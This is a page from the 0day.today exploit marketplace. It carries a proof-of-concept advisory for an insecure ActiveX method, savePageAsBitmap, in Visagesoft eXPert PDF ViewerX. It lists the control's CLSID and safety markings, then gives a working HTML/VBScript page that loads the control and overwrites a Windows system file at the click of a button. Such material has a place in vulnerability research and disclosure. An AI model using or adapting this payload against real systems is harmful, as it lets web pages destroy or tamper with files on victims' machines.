0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Visagesoft eXPert PDF ViewerX (VSPDFViewerX.ocx) File Overwrite
[===============================================================
Visagesoft eXPert PDF ViewerX (VSPDFViewerX.ocx) File Overwrite
===============================================================
VISAGESOFT eXPertPDFViewerX (VSPDFViewerX.ocx) INSECURE METHOD
SITE: http://www.visagesoft.com
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Author: Marco Torti
mail: marcotorti2[at]yahoo[dot]com
thanks UGIS
################################################################################
FileVersion: 3.0.990.0
CLSID: {BDF3E9D2-5F7A-4F4A-A914-7498C862EA6A}
Description: Visagesoft PDF Viewer Control
ProgID: VSPDFViewer.VSPDFViewer
Marked as:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
Vulnerable method:
savePageAsBitmap(ByVal bitmapFileName As String) As Boolean
##################################################################################
Vulnerability Description:
The "savePageAsBitmap" method doesn't check user supplied arguments so we
can save/overwrite a specified file passed as argument, i don't have time, check others functions....
Tested on Windows XP Professional SP3 fully patched, with Internet Explorer 7
###################################################################################
<object classid='clsid:BDF3E9D2-5F7A-4F4A-A914-7498C862EA6A' id='target'/></object>
<input language=VBScript onclick=launch() type=button value='start exploit'>
<script language='vbscript'>
Sub launch
target.savePageAsBitmap "c:\windows\-system.ini"
MsgBox"Exploit Completed.. file overwrite!"
End Sub
</script>
###################################################################################
# 0day.today [2024-12-23] #